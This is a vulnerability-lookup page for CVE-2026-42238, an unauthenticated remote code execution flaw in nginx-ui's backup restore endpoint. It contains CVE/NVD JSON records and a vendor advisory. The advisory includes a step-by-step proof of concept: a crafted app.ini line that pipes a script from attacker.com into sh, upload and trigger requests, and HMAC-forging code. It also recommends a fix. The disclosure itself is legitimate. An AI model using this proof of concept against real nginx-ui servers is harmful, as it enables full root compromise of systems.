Vulnerability-Lookup

CVE-2026-42238 (GCVE-0-2026-42238)

Vulnerability from cvelistv5 – Published: 2026-05-04 20:13 – Updated: 2026-05-05 15:50

Title

Unauthenticated Remote Code Execution via Backup Restore in nginx-ui

Summary

Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application's configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui — typically root in Docker deployments. This issue has been patched in version 2.3.8.

Severity ?

9 (Critical)


                        
                          CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/0xJacky/nginx-ui/security/advi…	x_refsource_CONFIRM
	https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	0xJacky	nginx-ui	Affected: < 2.3.8

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42238",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-05T15:49:03.741492Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-05T15:50:36.447Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nginx-ui",
          "vendor": "0xJacky",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.3.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application\u0027s configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui \u2014 typically root in Docker deployments. This issue has been patched in version 2.3.8."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 9,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-04T20:13:22.196Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr"
        },
        {
          "name": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8"
        }
      ],
      "source": {
        "advisory": "GHSA-4pvg-prr3-9cxr",
        "discovery": "UNKNOWN"
      },
      "title": "Unauthenticated Remote Code Execution via Backup Restore in nginx-ui"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42238",
    "datePublished": "2026-05-04T20:13:22.196Z",
    "dateReserved": "2026-04-25T05:37:12.118Z",
    "dateUpdated": "2026-05-05T15:50:36.447Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42238",
      "date": "2026-05-06",
      "epss": "0.0023",
      "percentile": "0.45582"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42238\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-04T21:16:32.707\",\"lastModified\":\"2026-05-06T14:45:44.013\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application\u0027s configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui \u2014 typically root in Docker deployments. This issue has been patched in version 2.3.8.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.3.8\",\"matchCriteriaId\":\"FB1A4031-FD2F-49D7-8021-128BA057C4FA\"}]}]}],\"references\":[{\"url\":\"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42238\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-05T15:49:03.741492Z\"}}}], \"references\": [{\"url\": \"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-05T15:48:19.149Z\"}}], \"cna\": {\"title\": \"Unauthenticated Remote Code Execution via Backup Restore in nginx-ui\", \"source\": {\"advisory\": \"GHSA-4pvg-prr3-9cxr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"0xJacky\", \"product\": \"nginx-ui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.3.8\"}]}], \"references\": [{\"url\": \"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr\", \"name\": \"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8\", \"name\": \"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application\u0027s configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui \\u2014 typically root in Docker deployments. This issue has been patched in version 2.3.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-04T20:13:22.196Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-42238\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-05T15:50:36.447Z\", \"dateReserved\": \"2026-04-25T05:37:12.118Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-04T20:13:22.196Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-42238

Vulnerability from fkie_nvd - Published: 2026-05-04 21:16 - Updated: 2026-05-06 14:45

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8	Release Notes
security-advisories@github.com	https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	nginxui	nginx_ui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1A4031-FD2F-49D7-8021-128BA057C4FA",
              "versionEndExcluding": "2.3.8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application\u0027s configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui \u2014 typically root in Docker deployments. This issue has been patched in version 2.3.8."
    }
  ],
  "id": "CVE-2026-42238",
  "lastModified": "2026-05-06T14:45:44.013",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-04T21:16:32.707",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-4PVG-PRR3-9CXR

Vulnerability from github – Published: 2026-05-06 17:03 – Updated: 2026-05-06 17:03

Summary

Nginx-UI is Vulnerable to Unauthenticated Remote Code Execution via Backup Restore

Details

Product: nginx-ui Repository: 0xJacky/nginx-ui (branch: dev) Vulnerability Class: Authentication Bypass → Arbitrary File Write → OS Command Injection Affected Component: POST /api/restore

1. Vulnerability Summary

nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application's configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui — typically root in Docker deployments.

The 10-minute unauthenticated window resets on every process restart, making this exploitable not only on initial deployments but on any restart event (container restart, upgrade, health-check-triggered restart).

2. Root Cause Analysis

2.1 The Restore Route Is Registered Without Authentication

backup.InitRouter is called on the root group, which carries only IPWhiteList() middleware — no AuthRequired(): 1

The route definition: 2

2.2 The `authIfInstalled` Guard Has a Time-Bounded Bypass

The only authentication guard on the restore route is authIfInstalled: 3

It calls AuthRequired() only when InstallLockStatus() || IsInstallTimeoutExceeded() is true. Both conditions are false on a fresh install within the first 10 minutes: 4

InstallLockStatus() returns false because JwtSecret is "" on a fresh install and SkipInstallation defaults to false.
IsInstallTimeoutExceeded() returns false for the first 10 minutes after startupTime is set in init().

When both are false, authIfInstalled calls ctx.Next() with zero authentication.

2.3 The `EncryptedForm` Middleware Is Not a Security Barrier

The EncryptedForm() middleware between authIfInstalled and RestoreBackup is optional — it only activates if the request includes an encrypted_params field. If that field is absent, it calls c.Next() immediately: 5

An attacker sends a plain multipart/form-data request without encrypted_params and the middleware is a no-op.

2.4 The Attacker Controls the AES Key Used to Verify the Backup

The restore handler accepts the AES key and IV directly from the attacker via the security_token form field: 6

The manifest integrity check derives its HMAC signing key from the attacker-supplied AES key: 7

Since the attacker crafts the backup and supplies the key, they can produce a valid HMAC signature for any manifest content they choose. The integrity check is self-referential and provides no security against a crafted backup.

2.5 Restore Overwrites `app.ini` and the SQLite Database Unconditionally

When restore_nginx_ui=true, restoreNginxUIConfig directly copies files from the backup onto disk with no content validation: 8

2.6 Restored `TestConfigCmd` Is Executed as a Shell Command

After restore, risefront.Restart() is called, reloading app.ini: 9

On the next call to TestConfig(), the value of TestConfigCmd from the restored app.ini is passed verbatim to /bin/sh -c: 10 11

3. Attack Prerequisites

Requirement	Notes
Network access to nginx-ui port	Default: 9000/tcp
Target is a fresh install	`JwtSecret` is empty in `app.ini`
Within 10 minutes of last process start	Window resets on every restart
IP not blocked by `IPWhiteList`	Default config has no IP whitelist

The 10-minute window is not a meaningful mitigation in practice. Docker containers restart frequently due to health checks, upgrades, and orchestrator rescheduling. Any restart resets startupTime via init(), reopening the window.

4. Step-by-Step Proof of Concept

Step 1 — Confirm the installation window is open

GET /api/install HTTP/1.1
Host: target:9000

Expected response confirming vulnerability:

{"lock": false, "timeout": false}

Step 2 — Craft the malicious backup

The backup format (derived from internal/backup/backup.go) is:

backup-TIMESTAMP.zip          ← outer ZIP (unencrypted)
├── manifest.json             ← JSON manifest
├── manifest.sig              ← HMAC-SHA256 of manifest.json
├── nginx-ui.zip              ← AES-CBC encrypted inner ZIP
└── nginx.zip                 ← AES-CBC encrypted inner ZIP

2a. Generate a random 32-byte AES key and 16-byte IV.

2b. Create the malicious app.ini to place inside nginx-ui.zip:

[app]
JwtSecret = attacker_chosen_jwt_secret_32chars

[node]
Secret = attacker_chosen_node_secret

[nginx]
TestConfigCmd = curl http://attacker.com/shell.sh|sh

2c. Create a SQLite database (nginx-ui.db) with a known bcrypt hash for the admin user (optional — the node secret alone grants full API access).

2d. Package app.ini and nginx-ui.db into nginx-ui.zip. Package an empty or minimal nginx.zip.

2e. Encrypt both ZIPs with AES-256-CBC using your key and IV.

2f. Compute SHA-256 hashes and sizes of the encrypted ZIPs. Build manifest.json:

{
  "schema": 1,
  "created_at": "20260421-120000",
  "version": "2.0.0",
  "files": [
    {"name": "nginx-ui.zip", "sha256": "<hash>", "size": <size>},
    {"name": "nginx.zip",    "sha256": "<hash>", "size": <size>}
  ]
}

2g. Compute the HMAC-SHA256 signature of manifest.json using the signing key derived as:

import hashlib, hmac
context = b"nginx-ui-backup-signing-v1:"
signing_key = hashlib.sha256(context + aes_key).digest()
sig = hmac.new(signing_key, manifest_bytes, hashlib.sha256).hexdigest()

2h. Assemble the outer ZIP containing manifest.json, manifest.sig, nginx-ui.zip, nginx.zip.

Step 3 — Upload the malicious backup (no authentication required)

POST /api/restore HTTP/1.1
Host: target:9000
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="backup_file"; filename="evil.zip"
Content-Type: application/zip

[crafted backup bytes]
------Boundary
Content-Disposition: form-data; name="security_token"

<base64(aes_key)>:<base64(aes_iv)>
------Boundary
Content-Disposition: form-data; name="restore_nginx_ui"

true
------Boundary--

Expected response (HTTP 200):

{"nginx_ui_restored": true, "nginx_restored": false, "hash_match": true}

nginx-ui calls risefront.Restart() 2 seconds later, loading the attacker's app.ini.

Step 4 — Trigger RCE using the restored node secret

After the restart (wait ~3 seconds):

POST /api/nginx/test HTTP/1.1
Host: target:9000
X-Node-Secret: attacker_chosen_node_secret

nginx-ui executes:

/bin/sh -c "curl http://attacker.com/shell.sh|sh"

The attacker now has a reverse shell running as the nginx-ui process user (typically root in Docker).

5. Impact

Confidentiality: Full read access to all nginx configurations, TLS private keys, database contents, and secrets stored in app.ini.
Integrity: Arbitrary modification of all nginx configurations and nginx-ui application state.
Availability: Complete denial of service; nginx and nginx-ui can be stopped or misconfigured.
Scope: OS-level code execution. In Docker deployments (the primary distribution method), nginx-ui runs as root, giving the attacker full host access if the container has host mounts or privileged mode.

6. Affected Versions

All versions of nginx-ui where authIfInstalled is used as the sole authentication guard on POST /api/restore. The vulnerability is present in the current dev branch.

7. Recommended Fix

Primary fix — Require authentication unconditionally on the restore endpoint. The "allow restore during initial setup" design rationale does not justify unauthenticated access to a file-write primitive:

// api/backup/router.go
func InitRouter(r *gin.RouterGroup) {
    r.GET("/backup", middleware.AuthRequired(), CreateBackup)
    r.POST("/restore", middleware.AuthRequired(), middleware.EncryptedForm(), RestoreBackup)
}

If restore-during-setup is a required feature, it should be gated on a one-time setup token generated at startup and printed to the server console (similar to how Jenkins handles initial setup), not on a time window.

Secondary fix — Validate the content of restored app.ini before writing it to disk. Specifically, TestConfigCmd, ReloadCmd, and RestartCmd should be rejected or stripped from any externally-supplied backup.

8. Timeline

Date	Event
2026-04-21	Vulnerability identified via source code review
—	Vendor notification (pending)
—	CVE assignment (pending)

Citations

File: router/routers.go (L61-70)

    root := r.Group("/api", middleware.IPWhiteList())
    {
        public.InitRouter(root)
        crypto.InitPublicRouter(root)
        user.InitAuthRouter(root)
        license.InitRouter(root)

        system.InitPublicRouter(root)
        system.InitSelfCheckRouter(root)
        backup.InitRouter(root)

File: api/backup/router.go (L9-16)

// authIfInstalled requires auth if system is installed
func authIfInstalled(ctx *gin.Context) {
    if system.InstallLockStatus() || system.IsInstallTimeoutExceeded() {
        middleware.AuthRequired()(ctx)
    } else {
        ctx.Next()
    }
}

File: api/backup/router.go (L18-25)

func InitRouter(r *gin.RouterGroup) {
    // Backup always requires authentication (contains sensitive data)
    r.GET("/backup", middleware.AuthRequired(), CreateBackup)

    // Restore requires auth only after installation
    // This allows restoring backup during initial setup
    r.POST("/restore", authIfInstalled, middleware.EncryptedForm(), RestoreBackup)
}

File: api/system/install.go (L27-34)

func InstallLockStatus() bool {
    return settings.NodeSettings.SkipInstallation || cSettings.AppSettings.JwtSecret != ""
}

// IsInstallTimeoutExceeded checks if installation time limit (10 minutes) is exceeded
func IsInstallTimeoutExceeded() bool {
    return time.Since(startupTime) > 10*time.Minute
}

File: internal/middleware/encrypted_params.go (L69-75)

        // Check if encrypted_params field exists
        encryptedParams := c.Request.FormValue("encrypted_params")
        if encryptedParams == "" {
            // No encryption, continue normally
            c.Next()
            return
        }

File: api/backup/restore.go (L35-70)

    securityToken := c.PostForm("security_token") // Get concatenated key and IV
    // Get backup file
    backupFile, err := c.FormFile("backup_file")
    if err != nil {
        cosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrBackupFileNotFound, err.Error()))
        return
    }

    // Validate security token
    if securityToken == "" {
        cosy.ErrHandler(c, backup.ErrInvalidSecurityToken)
        return
    }

    // Split security token to get Key and IV
    parts := strings.Split(securityToken, ":")
    if len(parts) != 2 {
        cosy.ErrHandler(c, backup.ErrInvalidSecurityToken)
        return
    }

    aesKey := parts[0]
    aesIv := parts[1]

    // Decode Key and IV from base64
    key, err := base64.StdEncoding.DecodeString(aesKey)
    if err != nil {
        cosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrInvalidAESKey, err.Error()))
        return
    }

    iv, err := base64.StdEncoding.DecodeString(aesIv)
    if err != nil {
        cosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrInvalidAESIV, err.Error()))
        return
    }

File: api/backup/restore.go (L126-132)

    if restoreNginxUI {
        go func() {
            time.Sleep(2 * time.Second)
            // gracefully restart
            risefront.Restart()
        }()
    }

File: internal/backup/manifest.go (L156-163)

func deriveBackupSigningKeyFromAESKey(aesKey []byte) ([]byte, error) {
    if len(aesKey) == 0 {
        return nil, ErrInvalidAESKey
    }

    sum := sha256.Sum256(append([]byte(manifestKeyContext), aesKey...))
    return sum[:], nil
}

File: internal/backup/restore.go (L458-484)

// restoreNginxUIConfig restores nginx-ui configuration files
func restoreNginxUIConfig(nginxUIBackupDir string) error {
    // Get config directory
    configDir := filepath.Dir(cosysettings.ConfPath)
    if configDir == "" {
        return ErrConfigPathEmpty
    }

    // Restore app.ini to the configured location
    srcConfigPath := filepath.Join(nginxUIBackupDir, "app.ini")
    if err := copyFile(srcConfigPath, cosysettings.ConfPath); err != nil {
        return err
    }

    // Restore database file if exists
    dbName := settings.DatabaseSettings.GetName()
    srcDBPath := filepath.Join(nginxUIBackupDir, dbName+".db")
    destDBPath := filepath.Join(configDir, dbName+".db")

    // Only attempt to copy if database file exists in backup
    if _, err := os.Stat(srcDBPath); err == nil {
        if err := copyFile(srcDBPath, destDBPath); err != nil {
            return err
        }
    }

    return nil

File: internal/nginx/nginx.go (L25-36)

func TestConfig() (stdOut string, stdErr error) {
    mutex.Lock()
    defer mutex.Unlock()
    if settings.NginxSettings.TestConfigCmd != "" {
